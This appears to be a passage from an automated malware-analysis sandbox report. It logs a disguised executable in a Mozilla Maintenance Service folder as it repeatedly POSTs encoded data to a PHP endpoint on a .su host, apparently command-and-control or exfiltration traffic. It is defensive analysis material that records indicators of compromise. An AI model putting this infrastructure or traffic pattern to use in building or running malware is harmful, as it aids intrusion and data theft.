                                                                    Mar 5, 2024 22:28:05.729796886 CET5144OUTData Raw: 76 35 66 35 4e 74 76 4b 6a 4c 6a 58 44 6a 63 4f 37 2f 49 63 77 55 32 6b 2b 79 35 75 48 45 4e 67 31 52 49 54 6d 52 61 64 41 6e 57 70 5a 33 63 33 79 5a 50 4d 4c 30 62 6f 65 4a 2f 45 53 62 46 33 37 43 6e 47 64 4c 46 4c 46 39 66 65 48 50 37 6e 44 6b
                                                                    Data Ascii: v5f5NtvKjLjXDjcO7/IcwU2k+y5uHENg1RITmRadAnWpZ3c3yZPML0boeJ/ESbF37CnGdLFLF9feHP7nDk8zndzpH4xaob/K19qwKNkWxjoRqZ4T/Yodpl+7I9LY1mTmm2d5u6hPAXBwnS0CIHtrjYElet+7hvtf1x2SjDMhVLFc5Uy0JOhyk6dO+u0+80tCcRn5/AIuFmdnl7XqaiO+oiOwbtVCA9mQDtaChC80t6/HlF4h6lK
                                                                    Mar 5, 2024 22:28:05.729957104 CET7716OUTData Raw: 77 54 71 41 54 37 48 55 6c 6a 73 35 4e 6f 65 37 50 70 36 75 30 4d 35 37 67 45 78 50 4d 4d 65 4c 72 4e 7a 6d 37 5a 73 61 4c 63 76 36 4d 75 36 47 66 79 49 65 70 4e 6b 39 70 72 34 73 38 5a 67 39 4c 62 53 72 4f 33 44 38 62 5a 41 30 48 6b 67 34 30 2b
                                                                    Data Ascii: wTqAT7HUljs5Noe7Pp6u0M57gExPMMeLrNzm7ZsaLcv6Mu6GfyIepNk9pr4s8Zg9LbSrO3D8bZA0Hkg40+m6kMQDw3o2X8kKyru595plF+m1C06f3T3sZvjt8ZVXYfoA+cS7aPVRpS5KOr9xXwcPpHX41Sk5Rqeja9M8nN0yBhIlLI0TAYGanoWsd+XKFMElP4KM5H90vfQmb6464wrLI5Ib5lHdX+bcOS/pdV578SwxmZdR/vr
                                                                    Mar 5, 2024 22:28:05.730045080 CET10288OUTData Raw: 32 39 50 65 35 2f 49 62 59 43 6a 6b 4a 74 38 4b 6a 72 63 73 57 44 39 6f 43 4a 53 6f 6d 72 4c 47 4f 47 30 6a 6e 30 30 2f 76 43 31 72 59 30 4c 50 79 54 48 6f 58 32 68 72 44 63 6e 34 30 44 49 74 59 72 32 39 5a 66 36 67 69 38 6f 61 73 2f 57 48 35 2b
                                                                    Data Ascii: 29Pe5/IbYCjkJt8KjrcsWD9oCJSomrLGOG0jn00/vC1rY0LPyTHoX2hrDcn40DItYr29Zf6gi8oas/WH5+Hh4RDyc3fy7rRt1WNq43dnH4I29F3oO/N4hhZY0U3ScFF1xuw38nqx3SKW36vN6usbZpe0D5suUVuor/bv4gD3+8tFf/eP5nDsFlWYmP0L4of/TxCL/QviIYBOXjaoSMjx8L94Xe/65WDBF/u9GMvzs788YRuTLO2
                                                                    Mar 5, 2024 22:28:05.770653963 CET2572OUTData Raw: 79 4a 71 7a 4e 50 2b 52 6b 31 33 4d 2f 78 51 75 33 46 4d 57 32 51 5a 4d 30 6e 4e 43 33 49 69 58 6a 4c 75 6a 31 65 4b 6c 54 4c 33 35 4a 7a 6d 71 72 6f 4a 61 58 69 54 65 44 54 57 6a 52 47 78 61 50 65 33 69 57 68 41 62 39 69 6e 78 43 72 48 51 2f 64
                                                                    Data Ascii: yJqzNP+Rk13M/xQu3FMW2QZM0nNC3IiXjLuj1eKlTL35JzmqroJaXiTeDTWjRGxaPe3iWhAb9inxCrHQ/dhuqmSPumc+otDeksetxE2UtzvunDcvJ0b7GnIemDe8UwIaGi8nCFQbjMxV+3bmyowtJH1196NIEr8uovwHZZokOAEXt5BMbYRLH0YL+yiq7OWNl9rU19DP2JirMOs2Krkay+r1W9FrqXZL68NdNkmgh37skD5FKNV
                                                                    Mar 5, 2024 22:28:05.937144995 CET5144OUTData Raw: 49 68 65 49 39 76 50 6f 71 33 64 56 65 7a 68 49 62 74 2f 53 6c 2b 69 32 30 70 35 6f 64 74 72 77 72 30 4a 4a 43 41 59 61 37 66 41 39 53 44 63 35 66 46 61 6e 71 30 53 58 45 30 4e 59 55 64 66 51 76 64 6a 74 71 70 50 41 4c 79 45 58 4a 62 38 37 39 47
                                                                    Data Ascii: IheI9vPoq3dVezhIbt/Sl+i20p5odtrwr0JJCAYa7fA9SDc5fFanq0SXE0NYUdfQvdjtqpPALyEXJb879GLLIQJpjblEhgBH4J9SJiysdl7MBWS9AQCtEeCQhL+uPH+3fLD+uzgPpyK58rc7C/96CprxQmytc/M6AqJ078rFtHMKKvdFNvJilR9E4Mkm/52eiCMHfXNa1opKDJhSRKSm/ON+fqqVzKPQUxjmlVp740PKD00KbCZ
                                                                    Mar 5, 2024 22:28:05.937278032 CET7716OUTData Raw: 39 46 4c 7a 62 50 79 74 43 79 39 63 62 77 6e 39 4c 2f 4b 58 32 50 38 72 77 51 67 43 2b 41 67 77 46 54 2f 37 68 65 72 36 37 77 34 62 66 32 58 79 53 68 64 37 45 56 39 69 48 72 36 41 36 77 33 35 74 68 6a 4d 73 41 62 70 68 57 51 59 58 79 4d 53 33 73
                                                                    Data Ascii: 9FLzbPytCy9cbwn9L/KX2P8rwQgC+AgwFT/7her67w4bf2XyShd7EV9iHr6A6w35thjMsAbphWQYXyMS3suDRG3Jt73660KmoEE4AfFFLacDh0uNAC62+tLFZxJSTmBVyhkP4xUefGGnBnbsglPP2aRC8FfgAtOYPM1GPHZPQZFGJdTlMWQLCL+RMdzNT3m07GyzDqNDZiMnbzm+9y+bA6dsGISqqFFfPgmFF95P+JPorqpkBGF
                                                                    Mar 5, 2024 22:28:05.937321901 CET2572OUTData Raw: 77 5a 56 68 35 32 73 6d 2b 2b 65 46 79 5a 65 51 63 32 72 4d 4f 62 66 6c 59 72 38 32 68 49 67 49 38 75 2b 53 63 35 34 4d 77 61 31 79 67 66 74 4f 45 67 4b 76 46 6d 79 53 45 4c 59 30 49 4e 31 50 65 51 6a 41 6d 52 57 30 49 69 52 48 42 71 72 38 74 4b
                                                                    Data Ascii: wZVh52sm++eFyZeQc2rMObflYr82hIgI8u+Sc54Mwa1ygftOEgKvFmySELY0IN1PeQjAmRW0IiRHBqr8tK7IEz3nUKD98EKlzmw8wf2ecNHvYlCCORlUSEfgS3c/F6ZY3lZ8JScIrZop/bVMxZBOEz6bSDKQmgDDrwK+rOwWLgO2DxlyooX80yxfNQcHhukTthljvidXyduykx0URDxxqaPB6r8HmAAWqEmWY5st2FgDHs6iq3m
                                                                    Mar 5, 2024 22:28:05.937767982 CET12860OUTData Raw: 37 49 56 4e 53 31 42 6d 2b 4d 68 41 51 6d 41 4d 58 39 42 42 39 64 37 36 72 6c 6a 74 72 53 66 43 63 73 64 31 5a 2b 54 4f 76 7a 53 76 56 38 6f 39 6b 52 38 35 43 6b 65 37 65 35 4f 2f 7a 64 71 45 4b 78 69 67 63 63 44 67 76 54 6e 4d 69 74 2b 74 2b 50
                                                                    Data Ascii: 7IVNS1Bm+MhAQmAMX9BB9d76rljtrSfCcsd1Z+TOvzSvV8o9kR85Cke7e5O/zdqEKxigccDgvTnMit+t+Px0GgkWGZbjVZazPd4WZMTGOJMpUfqtkQcmYyxTaX9k0X7iujjgaXjvjv3luzfyOJ8SquXYhxFWpt96Dca36W8RozQccP9RZV11FikDOv+m8YV2es8/FJT6siaqtthwyjN3ywULN7dZPjRNmx/yQ63VqX5ibbs5Oqb
                                                                    Mar 5, 2024 22:28:05.938498974 CET5144OUTData Raw: 61 33 76 45 32 75 62 39 68 38 74 43 2b 55 32 31 6a 76 7a 35 56 58 50 67 54 32 4f 4c 6b 30 35 6c 78 37 43 39 4e 59 65 71 75 78 75 62 6b 58 50 4d 32 4b 48 46 65 32 38 55 52 70 46 6f 38 30 4b 76 67 5a 4d 4b 54 41 77 45 32 7a 66 38 70 54 44 74 6c 47
                                                                    Data Ascii: a3vE2ub9h8tC+U21jvz5VXPgT2OLk05lx7C9NYequxubkXPM2KHFe28URpFo80KvgZMKTAwE2zf8pTDtlGjpCcfA+usdpmZbsaVgyrnooVaMPB62IlhO9jTPyJdHJCCzJkZKdE2NYuyXQNjxa/NZQj1dS4urdbLrc1UPZikxkVo4YCQX/sfFItMQjlZaOhayaxhYEfWd2sE6nZbsH99C4SfSLECMwNjtXn5jc5Lx2VGd91fFC76


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.54974691.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:06.039627075 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:06.249785900 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:06.250010014 CET2596OUTData Raw: 51 5d 54 5b 5e 5c 55 56 5e 57 5a 51 57 5b 50 53 54 53 54 59 56 5c 57 55 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q]T[^\UV^WZQW[PSTSTYV\WUT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9,1"$3$&X;%38;\&35?'5+&4 1<1,)%Z"!Q*!
                                                                    Mar 5, 2024 22:28:06.485178947 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.54974791.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:06.817329884 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:07.026851892 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:07.027304888 CET2592OUTData Raw: 51 5a 54 5c 5b 5c 50 50 5e 57 5a 51 57 59 50 52 54 53 54 5f 56 5f 57 5d 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QZT\[\PP^WZQWYPRTST_V_W]T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9A.!2T'&$P&_;2]''Y2)T!!?<3$+&.;%Z"!Q*
                                                                    Mar 5, 2024 22:28:07.261246920 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.54974891.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:07.599061966 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:07.810404062 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:07.810885906 CET2596OUTData Raw: 54 5c 54 59 5e 5a 50 51 5e 57 5a 51 57 51 50 53 54 5d 54 5b 56 54 57 5a 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T\TY^ZPQ^WZQWQPST]T[VTWZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/1U'#\'5:,,6\&+3Y%_8#/'6? '&>X;%Z"!Q*
                                                                    Mar 5, 2024 22:28:08.047256947 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.54974991.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:08.285533905 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:08.492616892 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:08.492861986 CET1920OUTData Raw: 54 58 51 5d 5e 5b 55 51 5e 57 5a 51 57 5a 50 59 54 56 54 5d 56 5a 57 55 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TXQ]^[UQ^WZQWZPYTVT]VZWUT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9/!6R$1Z&%:Y/6X'Z28!8T"/?0B+\&-,)%Z"!Q*%
                                                                    Mar 5, 2024 22:28:08.724802017 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.54975091.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:08.383527040 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:08.595164061 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:08.601558924 CET2596OUTData Raw: 51 59 51 5d 5b 57 55 54 5e 57 5a 51 57 5d 50 5b 54 52 54 5f 56 58 57 5a 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QYQ][WUT^WZQW]P[TRT_VXWZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:,%#$,=$8#')<Q6<,W!, 3<&!;%Z"!Q*9
                                                                    Mar 5, 2024 22:28:08.840806007 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.54975191.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:09.179769993 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:09.392488003 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:09.392728090 CET2596OUTData Raw: 51 5d 54 5a 5b 5c 55 54 5e 57 5a 51 57 5a 50 5c 54 55 54 5a 56 5e 57 5b 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q]TZ[\UT^WZQWZP\TUTZV^W[T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9C82&$#"$:];Y!$2<U5Z?5/]0'$%,[89%Z"!Q*%
                                                                    Mar 5, 2024 22:28:09.630620003 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.54975291.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:09.957735062 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:10.166389942 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:10.166847944 CET2596OUTData Raw: 54 5c 51 5e 5b 56 55 55 5e 57 5a 51 57 5f 50 5c 54 54 54 59 56 5c 57 5f 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T\Q^[VUU^WZQW_P\TTTYV\W_T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9A8W.'0,Y2Y''X1("6<?^&$#\&2,%Z"!Q*1
                                                                    Mar 5, 2024 22:28:10.405184984 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.54975391.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:10.743438959 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:10.954071045 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:10.954355955 CET2596OUTData Raw: 54 59 54 58 5b 59 50 54 5e 57 5a 51 57 50 50 5b 54 5c 54 5a 56 5c 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TYTX[YPT^WZQWPP[T\TZV\W^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:;R063%&;&\'+;\2:$6!Z<&$;1.,%Z"!Q*
                                                                    Mar 5, 2024 22:28:11.192996979 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.2.54975491.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:11.526283026 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:11.735399961 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:11.735678911 CET2596OUTData Raw: 54 50 54 58 5e 5d 50 51 5e 57 5a 51 57 5d 50 59 54 51 54 5c 56 58 57 5c 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TPTX^]PQ^WZQW]PYTQT\VXW\T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:;2%$05Z3&>X/?=$')T!4!,$';\&%;9%Z"!Q*9
                                                                    Mar 5, 2024 22:28:11.972791910 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.2.54975591.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:12.306653976 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:12.516571045 CET25INHTTP/1.1 100 Continue
